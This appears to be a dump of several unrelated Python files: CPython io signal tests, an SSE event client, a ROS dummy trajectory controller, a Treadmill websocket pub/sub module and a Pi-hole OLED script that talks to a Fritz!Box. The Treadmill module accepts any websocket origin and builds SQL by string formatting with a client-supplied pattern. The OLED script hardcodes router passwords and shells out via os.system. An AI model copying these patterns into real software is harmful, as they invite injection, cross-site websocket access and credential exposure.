mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
events.py
|
import json
import time
import sseclient
import threading
import queue
from . import curves, util
from builtins import str
class EventListener:
def __init__(self, session, curve_list, start_time=None, timeout=None):
self.curve_cache = {}
ids = []
if not hasattr(curve_list, '__iter__') or isinstance(curve_list, str):
curve_list = [curve_list]
for curve in curve_list:
if isinstance(curve, curves.BaseCurve):
ids.append(curve.id)
self.curve_cache[curve.id] = curve
else:
ids.append(curve)
args = [util.make_arg('id', ids)]
if start_time is not None:
args.append(util.make_arg('start_time', start_time))
self.url = '/api/events?{}'.format('&'.join(args))
self.session = session
self.timeout = timeout
self.retry = 3000 # Retry time in milliseconds
self.client = None
self.queue = queue.Queue()
self.do_shutdown = False
self.worker = threading.Thread(target=self.fetch_events)
self.worker.daemon = True
self.worker.start()
def get(self):
try:
val = self.queue.get(timeout=self.timeout)
if isinstance(val, EventError):
raise val.exception
return val
except queue.Empty:
return EventTimeout()
def fetch_events(self):
while not self.do_shutdown:
try:
with self.session.data_request("GET", self.session.urlbase, self.url, stream=True) as stream:
self.client = sseclient.SSEClient(stream)
for sse_event in self.client.events():
if sse_event.event == 'curve_event':
event = CurveEvent(sse_event)
else:
event = DefaultEvent(sse_event)
if hasattr(event, 'id') and event.id in self.curve_cache:
event.curve = self.curve_cache[event.id]
self.queue.put(event)
if sse_event.retry is not None:
try:
self.retry = int(sse_event.retry)
except (TypeError, ValueError):
pass
if self.do_shutdown:
break
# Session was closed by server/network, wait for retry before looping.
time.sleep(self.retry / 1000.0)
except Exception as e:
self.queue.put(EventError(e))
break
def close(self, timeout=1):
self.do_shutdown = True
if self.client is not None:
self.client.close()
self.worker.join(timeout)
def __iter__(self):
return self
def __next__(self):
return self.get()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class EventError:
def __init__(self, exception):
self.exception = exception
def __str__(self):
return "{}".format(self.exception)
class EventTimeout:
"""Returned on timeout, etc."""
pass
class DefaultEvent(object):
def __init__(self, sse_event):
self._raw_event = sse_event
try:
self.json_data = json.loads(sse_event.data)
except (TypeError, ValueError):
self.json_data = None
class CurveEvent(DefaultEvent):
def __init__(self, sse_event):
super(CurveEvent, self).__init__(sse_event)
self.id = self.json_data['id']
self.curve = None
self.created = util.parsetime(self.json_data['created'])
self.operation = self.json_data['operation']
self.tag = None
self.issue_date = None
self.range = None
if 'tag' in self.json_data:
self.tag = self.json_data['tag']
if 'issue_date' in self.json_data:
self.issue_date = util.parsetime(self.json_data['issue_date'])
if 'range' in self.json_data:
self.range = util.parserange(self.json_data['range'])
|
dummy_joint_state_controller.py
|
#!/usr/bin/env python
# Copyright (c) 2014, Kei Okada
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import copy
import threading
import Queue
import actionlib
import actionlib_msgs
# Publish
from sensor_msgs.msg import JointState
# Subscribe
from control_msgs.msg import FollowJointTrajectoryAction
from control_msgs.msg import FollowJointTrajectoryResult
from trajectory_msgs.msg import JointTrajectoryPoint
"""
This fake_joint_trajectory action server enables MoveIt! to execute a planned path without running Gazebo or a controller for the real robot.
"""
class JointTrajectoryActionServer():
"""
Some of the methods defined in this class are copied from the MotionControllerSimulator defined in https://github.com/ros-industrial/industrial_core/blob/40a72f3e1f0e63be2f4cb99348ab1d53a21c2fdf/industrial_robot_simulator/industrial_robot_simulator
Basically, JointTrajectoryActionServer is an actionlib implementation of MotionControllerSimulator.
Constructor of motion controller simulator
"""
def __init__(self, joint_namespace, joint_names, update_rate = 100, buffer_size = 0):
# Class lock
self.lock = threading.Lock()
# start action server
self._as = actionlib.ActionServer(joint_namespace+'/follow_joint_trajectory', FollowJointTrajectoryAction, self.trajectory_callback, auto_start = False)
self._as.start()
num_joints = len(joint_names)
self.joint_names = joint_names
# Motion loop update rate (higher update rates result in smoother simulated motion)
self.update_rate = update_rate
rospy.logdebug("Setting motion update rate (hz): %f", self.update_rate)
# Initialize joint position
self.joint_positions = [0]*num_joints
rospy.logdebug("Setting initial joint state: %s", str(self.joint_positions))
# Initialize motion buffer (contains joint position lists)
self.motion_buffer = Queue.Queue(buffer_size)
rospy.logdebug("Setting motion buffer size: %i", buffer_size)
# Shutdown signal
self.sig_shutdown = False
# Stop signal
self.sig_stop = False
# Motion thread
self.motion_thread = threading.Thread(target=self._motion_worker)
self.motion_thread.daemon = True
self.motion_thread.start()
"""
Trajectory subscription callback (gets called whenever a joint trajectory
is received).
@param msg_in: joint trajectory message
@type msg_in: JointTrajectory
"""
def trajectory_callback(self, goal):
self._current_goal = goal
msg_in = goal.get_goal()
try:
rospy.logdebug('Received trajectory with %s points, executing callback', str(len(msg_in.trajectory.points)))
if self.is_in_motion():
if len(msg_in.trajectory.points) > 0:
rospy.logerr('Received trajectory while still in motion, trajectory splicing not supported')
else:
rospy.logdebug('Received empty trajectory while still in motion, stopping current trajectory')
self.stop()
self._current_goal.set_canceled(None, "This trajectory was canceled because another one was received")
else:
goal.set_accepted("This trajectory has been accepted")
self._current_goal = goal
for point in msg_in.trajectory.points:
point = self._to_controller_order(msg_in.trajectory.joint_names, point)
self.add_motion_waypoint(point)
except Exception as e:
rospy.logerr('Unexpected exception: %s', e)
rospy.logdebug('Exiting trajectory callback')
"""
Remaps point to controller joint order
@param keys: keys defining joint value order
@type keys: list
@param point: joint trajectory point
@type point: JointTrajectoryPoint
@return point: reorder point
@type point: JointTrajectoryPoint
"""
def _to_controller_order(self, keys, point):
#rospy.loginfo('to controller order, keys: %s, point: %s', str(keys), str(point))
pt_rtn = copy.deepcopy(point)
pt_rtn.positions = self._remap_order(self.joint_names, keys, point.positions)
return pt_rtn
"""
"""
def _remap_order(self, ordered_keys, value_keys, values, ordered_values = []):
#rospy.loginfo('remap order, ordered_keys: %s, value_keys: %s, values: %s', str(ordered_keys), str(value_keys), str(values))
if len(ordered_values) != len(ordered_keys):
ordered_values = [0]*len(ordered_keys)
mapping = dict(zip(value_keys, values))
#rospy.loginfo('maping: %s', str(mapping))
for i in range(len(ordered_keys)):
if ordered_keys[i] in mapping:
ordered_values[i] = mapping[ordered_keys[i]]
pass
return ordered_values
"""
"""
def add_motion_waypoint(self, point):
self.motion_buffer.put(point)
"""
"""
def get_joint_positions(self, full_joint_names, full_positions = []):
with self.lock:
return self._remap_order(full_joint_names, self.joint_names, self.joint_positions[:], full_positions)
"""
"""
def is_in_motion(self):
return not self.motion_buffer.empty()
"""
"""
def shutdown(self):
self.sig_shutdown = True
rospy.logdebug('Motion_Controller shutdown signaled')
"""
"""
def stop(self):
rospy.logdebug('Motion_Controller stop signaled')
with self.lock:
self._clear_buffer()
self.sig_stop = True
"""
"""
def interpolate(self, last_pt, current_pt, alpha):
intermediate_pt = JointTrajectoryPoint()
for last_joint, current_joint in zip(last_pt.positions, current_pt.positions):
intermediate_pt.positions.append(last_joint + alpha*(current_joint-last_joint))
intermediate_pt.time_from_start = last_pt.time_from_start + rospy.Duration(alpha*(current_pt.time_from_start.to_sec() - last_pt.time_from_start.to_sec()))
return intermediate_pt
"""
"""
def _clear_buffer(self):
with self.motion_buffer.mutex:
self.motion_buffer.queue.clear()
"""
"""
def _move_to(self, point, dur):
rospy.sleep(dur)
with self.lock:
if not self.sig_stop:
self.joint_positions = point.positions[:]
#rospy.loginfo('Moved to position: %s in %s', str(self.joint_positions), str(dur))
else:
rospy.logdebug('Stopping motion immediately, clearing stop signal')
self.sig_stop = False
"""
"""
def _motion_worker(self):
rospy.logdebug('Starting motion worker in motion controller simulator')
move_duration = rospy.Duration()
if self.update_rate != 0.:
update_duration = rospy.Duration(1./self.update_rate)
last_goal_point = JointTrajectoryPoint()
with self.lock:
last_goal_point.positions = self.joint_positions[:]
while not self.sig_shutdown:
try:
current_goal_point = self.motion_buffer.get()
# If the current time from start is less than the last, then it's a new trajectory
if current_goal_point.time_from_start < last_goal_point.time_from_start:
move_duration = current_goal_point.time_from_start
# Else it's an existing trajectory and subtract the two
else:
# If current move duration is greater than update_duration, move arm to interpolated joint position
# Provide an exception to this rule: if update rate is <=0, do not add interpolated points
move_duration = current_goal_point.time_from_start - last_goal_point.time_from_start
if self.update_rate > 0:
while update_duration < move_duration:
intermediate_goal_point = self.interpolate(last_goal_point, current_goal_point, update_duration.to_sec()/move_duration.to_sec())
self._move_to(intermediate_goal_point, update_duration.to_sec()) #TODO should this use min(update_duration, 0.5*move_duration) to smooth timing?
last_goal_point = copy.deepcopy(intermediate_goal_point)
move_duration = current_goal_point.time_from_start - intermediate_goal_point.time_from_start
if not self.is_in_motion() and self._current_goal.get_goal_status().status == actionlib_msgs.msg.GoalStatus.ACTIVE:
self._current_goal.set_succeeded(FollowJointTrajectoryResult(error_code = 0)) # ok
self._move_to(current_goal_point, move_duration)
last_goal_point = copy.deepcopy(current_goal_point)
except Exception as e:
rospy.logerr('Unexpected exception: %s', e)
rospy.logdebug("Shutting down motion controller")
"""
JointTrajectoryControllerNode
This class simulates a joint trajectory action.
"""
class JointTrajectoryControllerNode():
"""
Constructor of joint trajectory action
"""
def __init__(self):
rospy.init_node('dummy_joint_trajectory_controller')
# Class lock
self.lock = threading.Lock()
# Publish rate (hz)
self.pub_rate = rospy.get_param('pub_rate', 10.0)
rospy.logdebug("Setting publish rate (hz) based on parameter: %f", self.pub_rate)
# Joint names
self.joint_names = []
controller_list = rospy.get_param('/move_group/controller_list')
for controller in controller_list:
print controller['type'], controller['name'], controller['joints']
self.joint_names.extend(controller['joints'])
if len(self.joint_names) == 0:
rospy.logwarn("Joint list is empty, did you set controller_joint_name?")
rospy.loginfo("Simulating manipulator with %d joints: %s", len(self.joint_names), ", ".join(self.joint_names))
# Published to joint states
rospy.logdebug("Creating joint state publisher")
self.joint_state_pub = rospy.Publisher('joint_states', JointState, queue_size=1)
# Subscribe to a joint trajectory
rospy.logdebug("Creating joint trajectory action")
self.joint_trajectory_actions = []
for controller in controller_list:
self.joint_trajectory_actions.append(JointTrajectoryActionServer(controller['name'], controller['joints']))
# JointStates timed task (started automatically)
period = rospy.Duration(1.0/self.pub_rate)
rospy.logdebug('Setting up publish worker with period (sec): %s', str(period.to_sec()))
rospy.Timer(period, self.publish_worker)
# Clean up init
for ac in self.joint_trajectory_actions:
rospy.on_shutdown(ac.shutdown)
"""
The publish worker is executed at a fixed rate. This publishes the various
state and status information for the robot.
"""
def publish_worker(self, event):
self.joint_state_publisher()
"""
The joint state publisher publishes the current joint state and the current
feedback state (as these are closely related)
"""
def joint_state_publisher(self):
try:
joint_state_msg = JointState()
time = rospy.Time.now()
with self.lock:
#Joint states
joint_state_msg.header.stamp = time
joint_state_msg.name = self.joint_names
joint_positions = [0]*len(self.joint_names)
for ac in self.joint_trajectory_actions:
joint_positions = ac.get_joint_positions(self.joint_names, joint_positions)
joint_state_msg.position = joint_positions
self.joint_state_pub.publish(joint_state_msg)
except Exception as e:
rospy.logerr('Unexpected exception in joint state publisher: %s', e)
if __name__ == '__main__':
try:
rospy.loginfo('Starting dummy_joint_trajectory_controller')
controller = JointTrajectoryControllerNode()
rospy.spin()
except rospy.ROSInterruptException:
pass
|
__init__.py
|
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.concurrent
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
from treadmill import utils
_LOGGER = logging.getLogger(__name__)
class AggregateFuture(tornado.concurrent.Future):
"""Aggregation future to get done state if all depending future is done
"""
def __init__(self, name):
super(AggregateFuture, self).__init__()
self._not_ready = set()
self._ready_for_finish = False
self._name = name
self._total = 0
def ready_for_finish(self):
"""set ready for finish
if no pending, we directly set result
"""
self._ready_for_finish = True
if not self._not_ready:
self.set_result(self._total)
def depend(self, future):
"""add more dependency for ready
"""
self._total += 1
self._not_ready.add(id(future))
future.add_done_callback(self._done_callback)
def _done_callback(self, future):
"""future complete"""
self._not_ready.remove(id(future))
if self._ready_for_finish and (not self._not_ready):
_LOGGER.info('Future %s is to finish, %d aggregated.',
self._name, self._total)
self.set_result(self._total)
def make_handler(pubsub):
"""Make websocket handler factory."""
# pylint: disable=too-many-statements
class _WS(tornado.websocket.WebSocketHandler):
"""Base class contructor"""
def __init__(self, application, request, **kwargs):
"""Default constructor for tornado.websocket.WebSocketHandler"""
tornado.websocket.WebSocketHandler.__init__(
self, application, request, **kwargs
)
self._request_id = str(uuid.uuid4())
self._subscriptions = set()
def active(self, sub_id=None):
"""Return true if connection (and optional subscription) is active,
false otherwise.
If connection is not active, so are all of its subscriptions.
"""
if not self.ws_connection:
return False
return sub_id is None or sub_id in self._subscriptions
def open(self, *args, **kwargs):
"""Called when connection is opened.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection opened, remote ip: %s',
self._request_id, self.request.remote_ip)
def send_msg(self, msg):
"""Send message."""
_LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
future = None
try:
future = self.write_message(msg)
except Exception: # pylint: disable=W0703
_LOGGER.exception('[%s] Error sending message: %r',
self._request_id, msg)
return future
def close_with_log(self):
"""close current handler's socket with logging id
"""
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
def send_error_msg(self, error_str, sub_id=None, close_conn=True):
"""Convenience method for logging and returning errors.
If sub_id is provided, it will be included in the error message and
subscription will be removed.
Note: this method will close the connection after sending back the
error, unless close_conn=False.
"""
error_msg = {'_error': error_str,
'when': time.time()}
if sub_id is not None:
error_msg['sub-id'] = sub_id
_LOGGER.info('[%s] Removing subscription %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
pass
future = self.send_msg(error_msg)
if close_conn:
if future is None:
self.close_with_log()
else:
future.add_done_callback(lambda _f: self.close_with_log())
return future
def on_close(self):
"""Called when connection is closed.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection closed.', self._request_id)
def check_origin(self, origin):
"""Overriding check_origin method from base class.
This method returns true all the time.
"""
parsed_origin = urllib_parse.urlparse(origin)
_LOGGER.debug('parsed_origin: %r', parsed_origin)
return True
def on_message(self, message):
"""Manage event subscriptions."""
if not pubsub:
_LOGGER.fatal('pubsub is not configured, ignore.')
self.send_error_msg('Fatal: unexpected error', close_conn=True)
return
_LOGGER.info('[%s] Received message: %s',
self._request_id, message)
sub_id = None
close_conn = True
try:
sub_msg = json.loads(message)
sub_id = sub_msg.get('sub-id')
close_conn = sub_id is None
if sub_msg.get('unsubscribe') is True:
_LOGGER.info('[%s] Unsubscribing %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
self.send_error_msg(
'Invalid subscription: %s' % sub_id,
close_conn=False
)
return
if sub_id and sub_id in self._subscriptions:
self.send_error_msg(
'Subscription already exists: %s' % sub_id,
close_conn=False
)
return
topic = sub_msg.get('topic')
impl = pubsub.impl.get(topic)
if not impl:
self.send_error_msg(
'Invalid topic: %s' % topic,
sub_id=sub_id, close_conn=close_conn
)
return
subscription = impl.subscribe(sub_msg)
since = sub_msg.get('since', 0)
snapshot = sub_msg.get('snapshot', False)
if sub_id and not snapshot:
_LOGGER.info('[%s] Adding subscription %s',
self._request_id, sub_id)
self._subscriptions.add(sub_id)
sub_future = AggregateFuture('subscribe')
# if snapshot mode, we close handler socket after sow is done
if snapshot and close_conn:
sub_future.add_done_callback(
lambda _f: self.close_with_log()
)
for watch, pattern in subscription:
future = pubsub.register(
watch, pattern, self, impl, since, sub_id
)
sub_future.depend(future)
sub_future.ready_for_finish()
except Exception as err: # pylint: disable=W0703
self.send_error_msg(str(err),
sub_id=sub_id, close_conn=close_conn)
def data_received(self, chunk):
"""Passthrough of abstract method data_received.
"""
def on_event(self, filename, operation, _content):
"""Default event handler."""
_LOGGER.debug('%s %s', filename, operation)
return {'time': time.time(),
'filename': filename,
'op': operation}
return _WS
class DirWatchPubSub(object):
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern.
Returns a `tornado.concurrent.Future` that is done when the sow
(state of the world) publication completes.
"""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
return self._sow(
watch, pattern, since, ws_handler, impl,
sub_id=sub_id
)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path or '/server-trace/' in path:
# Specialized handling of trace files (no need to stat/read).
# If file was already deleted (trace cleanup), don't ignore it.
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
"""Get matching records from db."""
# if file does not exist, do not try to open it. Opening connection
# will create the file, there is no way to prevent this from
# happening until py3.
#
if not os.path.exists(db_path):
_LOGGER.info('Ignore deleted db: %s', db_path)
return (None, None)
# There is rare condition that the db file is deleted HERE. In this
# case connection will be open, but the tables will not be there.
conn = sqlite3.connect(db_path)
# Before Python 3.7 GLOB pattern must not be parametrized to use index.
select_stmt = """
SELECT timestamp, path, data FROM %s
WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
ORDER BY timestamp
""" % (sow_table, pattern)
# Return open connection, as conn.execute is cursor iterator, not
# materialized list.
try:
return conn, conn.execute(select_stmt, (watch, since,))
except sqlite3.OperationalError as db_err:
# Not sure if the file needs to be deleted at this point. As
# sow_table is a parameter, passing non-existing table can cause
# legit file to be deleted.
_LOGGER.info('Unable to execute: select from %s:%s ..., %s',
db_path, sow_table, str(db_err))
conn.close()
return (None, None)
# pylint: disable=too-many-branches
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
"""Publish state of the world."""
if since is None:
since = 0
def _publish(item):
when, path, content = item
future = None
try:
payload = impl.on_event(str(path), None, content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
future = handler.send_msg(payload)
except Exception as err: # pylint: disable=W0703
_LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
path, content, when, sub_id)
future = handler.send_error_msg(str(err), sub_id=sub_id)
return future
sow_future = AggregateFuture('sow[{}]'.format(pattern))
db_connections = []
fs_records = self._get_fs_sow(watch, pattern, since)
sow = getattr(impl, 'sow', None)
sow_table = getattr(impl, 'sow_table', 'sow')
try:
records = []
if sow:
dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
for db in dbs:
if os.path.basename(db).startswith('.'):
continue
conn, db_cursor = self._db_records(
db, sow_table, watch, pattern, since
)
if db_cursor:
records.append(db_cursor)
# FIXME: Figure out pylint use before assign
#
# pylint: disable=E0601
if conn:
db_connections.append(conn)
records.append(fs_records)
# Merge db and fs records, removing duplicates.
prev_path = None
for item in heapq.merge(*records):
_when, path, _content = item
if path == prev_path:
continue
prev_path = path
future = _publish(item)
if future is not None:
sow_future.depend(future)
# sow future will be done after all send_msg() are done
sow_future.ready_for_finish()
finally:
for conn in db_connections:
if conn:
conn.close()
return sow_future
def _get_fs_sow(self, watch, pattern, since):
"""Get state of the world from filesystem."""
root_len = len(self.root)
fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
files = glob.glob(fs_glob)
items = []
for filename in files:
try:
stat = os.stat(filename)
with io.open(filename) as f:
content = f.read()
if stat.st_mtime >= since:
path, when = filename[root_len:], stat.st_mtime
items.append((when, path, content))
except (IOError, OSError) as err:
# Ignore deleted files.
if err.errno != errno.ENOENT:
raise
return sorted(items)
def _gc(self):
"""Remove disconnected websocket handlers."""
for directory in list(six.viewkeys(self.handlers)):
handlers = [
(pattern, handler, impl, sub_id)
for pattern, handler, impl, sub_id in self.handlers[directory]
if handler.active(sub_id=sub_id)
]
_LOGGER.debug('Number of active handlers for %s: %s',
directory, len(handlers))
if not handlers:
_LOGGER.debug('No active handlers for %s', directory)
self.handlers.pop(directory, None)
if directory not in self.watch_dirs:
# Watch is not permanent, remove dir from watcher.
self.watcher.remove_dir(directory)
else:
self.handlers[directory] = handlers
@utils.exit_on_unhandled
def run(self, once=False):
"""Run event loop."""
last_gc = time.time()
while True:
wait_interval = 10
if once:
wait_interval = 0
if self.watcher.wait_for_events(wait_interval):
self.watcher.process_events()
if (time.time() - last_gc) >= wait_interval:
self._gc()
last_gc = time.time()
if once:
break
@utils.exit_on_unhandled
def run_detached(self):
"""Run event loop in separate thread."""
event_thread = threading.Thread(target=self.run)
event_thread.daemon = True
event_thread.start()
|
dualkarsten.py
|
#!/usr/bin/python3
import os, sys
import platform
import humanize
import psutil
import requests
import time
#import threading
#from threading import Thread
from multiprocessing import Process
#imports for Fritz.Box
from fritzconnection.lib.fritzstatus import FritzStatus
from fritzconnection.lib.fritzhosts import FritzHosts
from fritzconnection.lib.fritzwlan import FritzWLAN
from fritzconnection.lib.fritzcall import FritzCall
#imports for Display
from luma.core.interface.serial import i2c
from luma.core.sprite_system import framerate_regulator
from luma.oled.device import ssd1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageSequence
from datetime import datetime
interface = os.getenv('PIHOLE_OLED_INTERFACE', 'eth0') #Network interface to retrieve the IP address
mount_point = os.getenv('PIHOLE_OLED_MOUNT_POINT', '/') #Mount point for disk usage info
#initialisation for Fritz.Box API / IP and Password needs to be customized:
fs = FritzStatus(address='192.168.178.1', password='password')
fh = FritzHosts(address='192.168.178.1', password='password')
fw = FritzWLAN(address='192.168.178.1', password='password')
fc = FritzCall(address='192.168.178.1', password='password')
serial = i2c(port=1, address=0x3C)
disp = ssd1306(serial)
serial2 = i2c(port=0, address=0x3C)
disp2 = ssd1306(serial2)
width = disp.width
height = disp.height
UPTag = ''
def CheckIfUp():
SystemIP = '192.168.178.27'
UPTag = os.system("ping -c 1 " + SystemIP)
f = open("UPTag.txt", "w")
f.write(str(UPTag))
f.close()
def load_font(filename, font_size):
font_path = '/home/pi/PiHole-UI/fonts/'
try:
font = ImageFont.truetype(font_path + filename, font_size)
except IOError:
print('font file not found -> using default font')
font = ImageFont.load_default()
return font
image = Image.new('1', (width, height))
draw = ImageDraw.Draw(image)
def show_logoleft(filename, device):
logoImage = Image.new('1', (device.width, device.height))
img_path = '/home/pi/PiHole-UI/res/'
try:
logoImage = Image.open(img_path + filename).convert('1')
except IOError:
print("Cannot open file %s" % filename)
pass
device.display(logoImage)
def show_logoright(filename, device):
logoImage = Image.new('1', (device.width, device.height))
img_path = '/home/pi/PiHole-UI/res/'
try:
logoImage = Image.open(img_path + filename).convert('1')
except IOError:
print("Cannot open file %s" % filename)
pass
device.display(logoImage)
